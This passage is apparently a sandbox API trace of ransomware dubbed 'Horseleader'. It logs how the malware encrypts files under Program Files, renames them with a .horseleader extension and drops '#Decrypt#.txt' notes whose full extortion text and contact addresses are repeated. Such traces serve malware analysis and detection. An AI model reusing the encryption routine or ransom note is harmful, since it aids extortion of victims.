\r\ntell your unique ID\r\n") returned 1508 [0250.757] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.758] lstrlenA (lpString="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") returned 1368 [0250.758] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.758] CloseHandle (hObject=0x21c) returned 1 [0250.758] GetProcessHeap () returned 0x780000 [0250.758] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.759] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Web Folders", cAlternateFileName="WEBFOL~1")) returned 1 [0250.759] lstrcmpiW (lpString1="Web Folders", lpString2="Windows") returned -1 [0250.759] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders") returned 62 [0250.759] lstrcmpW (lpString1="Web Folders", lpString2=".") returned 1 [0250.759] lstrcmpW (lpString1="Web Folders", lpString2="..") returned 1 [0250.759] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.759] GetProcessHeap () returned 0x780000 [0250.759] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0250.759] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*") returned 64 [0250.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.761] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.761] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\.") returned 64 [0250.761] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.761] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.761] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.761] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\..") returned 65 [0250.761] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.761] lstrcmpW 
(lpString1="..", lpString2="..") returned 0 [0250.761] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeeeb5310, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="1033", cAlternateFileName="")) returned 1 [0250.761] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0250.761] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033") returned 67 [0250.761] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0250.761] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0250.761] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.761] GetProcessHeap () returned 0x780000 [0250.762] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.762] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*") returned 69 [0250.762] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeeeb5310, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdcd6045c, dwReserved1=0xb2bd2b59, 
cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0250.762] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.762] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\.") returned 69 [0250.762] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.762] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeeeb5310, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdcd6045c, dwReserved1=0xb2bd2b59, cFileName="..", cAlternateFileName="")) returned 1 [0250.762] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.762] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\..") returned 70 [0250.763] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.763] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.763] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca8c600, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbca8c600, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x2988, dwReserved0=0xdcd6045c, dwReserved1=0xb2bd2b59, cFileName="MSOSVINT.DLL", cAlternateFileName="")) returned 1 [0250.763] lstrcmpiW (lpString1="MSOSVINT.DLL", lpString2="Windows") returned -1 [0250.763] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL") returned 80 [0250.763] StrStrIW (lpFirst="MSOSVINT.DLL", lpSrch=".horseleader") returned 0x0 [0250.763] lstrcmpW (lpString1="MSOSVINT.DLL", lpString2="#Decrypt#.txt") returned 1 [0250.763] lstrcmpW (lpString1="MSOSVINT.DLL", lpString2="_uninstalling_.png") returned 1 [0250.763] lstrlenW (lpString=".testttjffg") returned 11 [0250.763] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL", lpSrch=".testttjffg") returned 0x0 [0250.763] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.763] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\msosvint.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.765] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL") returned 80 [0250.765] StrStrW (lpFirst="MSOSVINT.DLL", lpSrch=".txt") returned 0x0 [0250.765] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=10632) returned 1 [0250.765] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2988, lpOverlapped=0x0) returned 1 [0250.767] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd678, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.767] WriteFile 
(in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2988, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2988, lpOverlapped=0x0) returned 1 [0250.768] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.768] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.771] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.771] CloseHandle (hObject=0x1a4) returned 1 [0250.772] GetProcessHeap () returned 0x780000 [0250.772] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.772] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL.horseleader") returned 92 [0250.772] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\msosvint.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\msosvint.dll.horseleader")) returned 1 [0250.773] GetProcessHeap () returned 0x780000 [0250.773] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.773] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0xbca8c600, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbca8c600, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x2988, dwReserved0=0xdcd6045c, dwReserved1=0xb2bd2b59, cFileName="MSOSVINT.DLL", cAlternateFileName="")) returned 0 [0250.773] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0250.773] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\#Decrypt#.txt") returned 81 [0250.773] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.774] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.774] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0250.775] lstrlenA (lpString="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") returned 1368 [0250.775] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0250.776] CloseHandle (hObject=0x158) returned 1 [0250.776] GetProcessHeap () returned 0x780000 [0250.776] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.776] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdd9f300, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbdd9f300, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0xaf88, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOSV.DLL", cAlternateFileName="")) returned 1 [0250.776] lstrcmpiW (lpString1="MSOSV.DLL", lpString2="Windows") returned -1 [0250.776] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL") returned 72 [0250.776] StrStrIW (lpFirst="MSOSV.DLL", lpSrch=".horseleader") returned 0x0 [0250.776] lstrcmpW (lpString1="MSOSV.DLL", lpString2="#Decrypt#.txt") returned 1 [0250.776] lstrcmpW (lpString1="MSOSV.DLL", lpString2="_uninstalling_.png") returned 1 [0250.776] lstrlenW (lpString=".testttjffg") returned 11 [0250.776] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\Web Folders\\MSOSV.DLL", lpSrch=".testttjffg") returned 0x0 [0250.776] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.776] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.777] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\msosv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.777] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL") returned 72 [0250.777] StrStrW (lpFirst="MSOSV.DLL", lpSrch=".txt") returned 0x0 [0250.777] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=44936) returned 1 [0250.777] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.780] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.780] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.781] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.782] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.782] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.782] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xf88, lpOverlapped=0x0) returned 1 [0250.782] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff078, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.782] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xf88, lpOverlapped=0x0) returned 1 [0250.782] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.783] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0250.783] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0250.783] CloseHandle (hObject=0x158) returned 1 [0250.783] GetProcessHeap () returned 0x780000 [0250.783] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.783] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL.horseleader") returned 84 
[0250.783] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\msosv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\msosv.dll.horseleader")) returned 1 [0250.784] GetProcessHeap () returned 0x780000 [0250.784] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.784] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdd9f300, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbdd9f300, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0xaf88, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOSV.DLL", cAlternateFileName="")) returned 0 [0250.784] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.785] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\#Decrypt#.txt") returned 76 [0250.785] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.785] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) 
client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.785] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.787] lstrlenA (lpString="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") returned 1368 [0250.787] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.787] CloseHandle (hObject=0x21c) returned 1 [0250.787] GetProcessHeap () returned 0x780000 [0250.787] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.787] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0250.787] lstrcmpiW (lpString1="Web Server Extensions", lpString2="Windows") returned -1 [0250.787] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions") returned 72 [0250.787] lstrcmpW (lpString1="Web Server Extensions", lpString2=".") returned 1 [0250.787] lstrcmpW (lpString1="Web Server Extensions", lpString2="..") returned 1 [0250.788] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.788] 
